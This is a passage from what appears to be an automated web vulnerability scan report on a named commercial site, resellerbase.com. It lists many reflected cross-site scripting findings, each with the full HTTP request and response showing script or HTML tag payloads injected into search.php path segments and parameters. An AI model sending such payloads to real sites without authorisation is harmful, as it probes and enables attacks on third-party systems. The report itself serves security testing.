Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmosb533f<script>alert(1)</script>fde8bb3f327/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3695. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload faade<script>alert(1)</script>a85c05c0cc7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/imagesfaade<script>alert(1)</script>a85c05c0cc7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/imagesfaade<script>alert(1)</script>a85c05c0cc7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3696. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8a6f6<script>alert(1)</script>d5673cf7cba was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating8a6f6<script>alert(1)</script>d5673cf7cba/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating8a6f6<script>alert(1)</script>d5673cf7cba/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3697. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 98861<script>alert(1)</script>7d290f323c7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/search.php98861<script>alert(1)</script>7d290f323c7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php98861<script>alert(1)</script>7d290f323c7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3698. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3f4db<a>3e7e2eb2ed0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3f4db<a>3e7e2eb2ed0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3f4db<a>3e7e2eb2ed0&opt=2 was not found on this server.</p>
...[SNIP]...

2.3699. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 96794<a>9c6a948740f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...96794<a>9c6a948740f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php?keyword=search...96794<a>9c6a948740f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3700. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0495<script>alert(1)</script>4b4a641cba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e0495<script>alert(1)</script>4b4a641cba5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e0495<script>alert(1)</script>4b4a641cba5=1 was not found on this server.</p>
...[SNIP]...

2.3701. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f769d<a>fb13af5a55 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2f769d<a>fb13af5a55 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2f769d<a>fb13af5a55 was not found on this server.</p>
...[SNIP]...

2.3702. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload faeb6<script>alert(1)</script>64ba1d09836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfaeb6<script>alert(1)</script>64ba1d09836/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfaeb6<script>alert(1)</script>64ba1d09836/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3703. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e1252<script>alert(1)</script>bec7def14c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8e1252<script>alert(1)</script>bec7def14c6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8e1252<script>alert(1)</script>bec7def14c6/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3704. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 33b1a<script>alert(1)</script>38b886031cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes33b1a<script>alert(1)</script>38b886031cd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes33b1a<script>alert(1)</script>38b886031cd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3705. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1a746<script>alert(1)</script>a2bb570e476 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos1a746<script>alert(1)</script>a2bb570e476/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos1a746<script>alert(1)</script>a2bb570e476/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3706. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2abf7<script>alert(1)</script>448ca6af0b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images2abf7<script>alert(1)</script>448ca6af0b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images2abf7<script>alert(1)</script>448ca6af0b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3707. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload bad84<script>alert(1)</script>9a581ffc2b3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/search.phpbad84<script>alert(1)</script>9a581ffc2b3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.phpbad84<script>alert(1)</script>9a581ffc2b3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3708. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bd13f<a>6b02795c7d6 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchbd13f<a>6b02795c7d6&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchbd13f<a>6b02795c7d6&opt=2 was not found on this server.</p>
...[SNIP]...

2.3709. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c1b72<a>b811619def7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...c1b72<a>b811619def7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.php?keyword=search...c1b72<a>b811619def7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3710. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 14dfc<script>alert(1)</script>757529b4736 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&14dfc<script>alert(1)</script>757529b4736=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&14dfc<script>alert(1)</script>757529b4736=1 was not found on this server.</p>
...[SNIP]...

2.3711. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 34fbc<a>2d36973ec07 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=234fbc<a>2d36973ec07 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
